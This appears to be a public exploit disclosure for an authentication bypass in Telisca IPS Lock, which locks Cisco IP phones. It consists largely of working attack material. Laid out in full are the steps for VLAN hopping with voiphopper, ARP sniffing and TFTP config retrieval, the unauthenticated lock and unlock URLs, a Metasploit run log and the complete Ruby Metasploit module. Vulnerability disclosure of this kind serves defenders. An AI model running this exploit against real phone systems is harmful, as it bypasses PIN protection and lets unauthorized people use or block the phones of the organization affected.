a vulnerability in IPS LOCK , below is the description : # Exploit Title: TELISCA IPS LOCK ABUSE # Date: 13/01/2016 # Software Link: http://www.telisca.com/products/ip-phone-apps/ipslock/ # Exploit Author: Fakhir Karim Reda # Contact: karim.fakhir@xxxxxxxxx # Metasploit module : https://www.rapid7.com/db/modules/auxiliary/voip/telisca_ips_lock_control # Publicly disclosed via Metaploit PR 'URL', 'https://github.com/rapid7/metasploit-framework/pull/6470' # Category: VOIP 1. Description Telisca IPS Lock 2(IPS Lock is an XML application for Cisco IP Phones which permits locking the phones and preventing any unauthorized calls. http://www.telisca.com/ips-lock-2/) suffers from vulnerability that allows any attacker to lock/unlock IP-Phones without knowing the pin code. The attacker have just to do http request to IPS Lock Server with Mac ADDR of the phone: For example to lock the IP Phone SEP27745DA145D2 : http://IPSLOCKSRV:80/IPSPCFG/user/Default.aspx?action=DO&tg=L&pn=SEP27745DA145D2&dp=&gr=&gl= For example to unlock the IP Phone SEP27745DA145D2 : http://IPSLOCKSRV/IPSPCFG/user/Default.aspx?action=U7LCK&pn=SEP88908D68C5D4&dp= Source of problem : The page default.aspx did not check if the pin code is present or correct. 2. Proof of Concept The attacker sniff for cdp protocol, and then he identified the vlan voice , for example VLAN 3 : With tool like voiphopper he can get an ip on this vlan : #voiphopper -i eth0 -v 3 #ifconfig eth0.3 Link encap:Ethernet HWaddr b8:ca:3a:9c:fa:41 inet addr:10.16.43.190 Bcast:10.16.43.255 Mask:255.255.252.0 inet6 addr: fe80::baca:3aff:fe9c:fa41/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:309658 errors:0 dropped:9 overruns:0 frame:0 TX packets:23988 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:15123464 (14.4 MiB) TX bytes:1906037 (1.8 MiB) We can now sniff for ARP requests, in order to get the MAC ADDR of phones : # tcpdump -vvv -e -s 1500 -i eth0.3 "icmp or arp" tcpdump: listening on eth0.3, link-type EN10MB (Ethernet), capture size 1500 bytes 16:31:08.531106 00:50:56:be:5e:a7 (oui Unknown) > Broadcast, ethertype ARP (0x0806), length 60: Ethernet (len 6), IPv4 (len 4), Request who-has 10.16.43.184 tell 10.16.40.12, length 46 16:31:08.817916 88:90:8d:73:e7:43 (oui Unknown) > Broadcast, ethertype ARP (0x0806), length 60: Ethernet (len 6), IPv4 (len 4), Request who-has 172.16.40.100 tell 172.16.42.120, length 46 With network scanner he identified the TFTP Server for example 10.16.43.1 : We can download the ip phones configs #tftp 10.16.43.1 get SEPSEP27745DA145D2.cnf.xml The content of the file contain the IPS LOCK IP server : </phoneService> <phoneService type="0" category="0"> <name>IPS Phone Config / IPS Lock</name> <url>http://IPSLOCKSRV:80/IPSPCFG/user/Default.aspx?pn=#DEVICENAME#</url> <vendor></vendor> <version></version> </phoneService> </phoneServices> </device> Accessi to the URL http://IPSLOCKSRV:80/IPSPCFG/user/Default.aspx?pn=#DEVICENAME# he can now get the URLS for locking and unlocking services: http://IPSLOCKSRV:80/IPSPCFG/user/Default.aspx?action=DO&tg=L&pn=SEP27745DA145D2&dp=&gr=&gl= For example to unlock the IP Phone SEP27745DA145D2 : http://IPSLOCKSRV/IPSPCFG/user/Default.aspx?action=U7LCK&pn=SEP88908D68C5D4&dp= Finally we can use this metasploit module : https://raw.githubusercontent.com/kfr-ma/metasploit-framework/test_telisca_ipslock/modules/auxiliary/voip/telisca_ips_lock_control.rb to lock and unlock phones : [*] Processing telisco.rb for ERB directives. resource (telisco.rb)> use auxiliary/scanner/voice/telisca_ips_lock_abuse resource (telisco.rb)> set PHONENAME SEP27745DA145D2 PHONENAME=> SEPC80084ED0DBD resource (telisco.rb)> set RHOST 10.16.40.18 RHOST =>10.16.40.18 resource (telisco.rb)> set VHOST 10.16.40.18 VHOST => 10.16.40.18 resource (telisco.rb)> set ACTION UNLOCK ACTION => UNLOCK resource(telisco.rb)> run [+] Try to unlock [+] Deivice SEP27745DA145D2 successfully unlocked [*] Auxiliary module execution completed msf auxiliary(telisca_ips_lock_abuse) > Below the source code of the exploit : ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Telisca IPS Lock Cisco IP Phone Control', 'Description' => %q{ This module allows an unauthenticated attacker to exercise the "Lock" and "Unlock" functionality of Telisca IPS Lock for Cisco IP Phones. This module should be run in the VoIP VLAN, and requires knowledge of the target phone's name (for example, SEP002497AB1D4B). Set ACTION to either LOCK or UNLOCK. UNLOCK is the default. }, 'References' => [ # Publicly disclosed via Metaploit PR 'URL', 'https://github.com/rapid7/metasploit-framework/pull/6470' ], 'Author' => [ 'Fakhir Karim Reda <karim.fakhir[at]gmail.com>' ], 'License' => MSF_LICENSE, 'DisclosureDate' => 'Dec 17 2015', 'Actions' => [ ['LOCK', 'Description' => 'To lock a phone'], ['UNLOCK', 'Description' => 'To unlock a phone'] ], 'DefaultAction' => 'UNLOCK' )) register_options( [ OptAddress.new('RHOST', [true, 'The IPS Lock IP Address']), OptString.new('PHONENAME', [true, 'The name of the target phone']) ], self.class) end def print_status(msg='') super("#{peer} - #{msg}") end def print_good(msg='') super("#{peer} - #{msg}") end def print_error(msg='') super("#{peer} - #{msg}") end # Returns the status of the listening port. # # @return [Boolean] TrueClass if port open, otherwise FalseClass. def port_open? begin res = send_request_raw({'method' => 'GET', 'uri' => '/'}) return true if res rescue ::Rex::ConnectionRefused vprint_status("Connection refused") rescue ::Rex::ConnectionError vprint_error("Connection failed") rescue ::OpenSSL::SSL::SSLError vprint_error("SSL/TLS connection error") end false end # Locks a device. # # @param phone_name [String] Name of the phone used for the pn parameter. # # @return [void] def lock(phone_name) res = send_request_cgi({ 'method' => 'GET', 'uri' => '/IPSPCFG/user/Default.aspx', 'headers' => { 'Connection' => 'keep-alive', 'Accept-Language' => 'en-US,en;q=0.5' }, 'vars_get' => { 'action' => 'DO', 'tg' => 'L', 'pn' => phone_name, 'dp' => '', 'gr' => '', 'gl' => '' } }) if res && res.code == 200 if res.body.include?('Unlock') || res.body.include?('U7LCK') print_good("The device #{phone_name} is already locked") elsif res.body.include?('unlocked') || res.body.include?('Locking') || res.body.include?('QUIT') print_good("Device #{phone_name} successfully locked") end elsif res print_error("Unexpected response #{res.code}") else print_error('The connection timed out while trying to lock.') end end # Unlocks a phone. # # @param phone_name [String] Name of the phone used for the pn parameter. # # @return [void] def unlock(phone_name) res = send_request_cgi({ 'method' => 'GET', 'uri' => '/IPSPCFG/user/Default.aspx', 'headers' => { 'Connection' => 'keep-alive', 'Accept-Language' => 'en-US,en;q=0.5' }, 'vars_get' => { 'action' => 'U7LCK', 'pn' => phone_name, 'dp' => '' } }) if res && res.code == 200 if res.body.include?('Unlock') || res.body.include?('U7LCK') print_good("The device #{phone_name} is already locked") elsif res.body.include?('unlocked') || res.body.include?('QUIT') print_good("The device #{phone_name} successfully unlocked") end elsif res print_error("Unexpected response #{res.code}") else print_error('The connection timed out while trying to unlock') end end def run unless port_open? print_error('The web server is unreachable!') return end phone_name = datastore['PHONENAME'] case action.name when 'LOCK' lock(phone_name) when 'UNLOCK' unlock(phone_name) end end end Regards.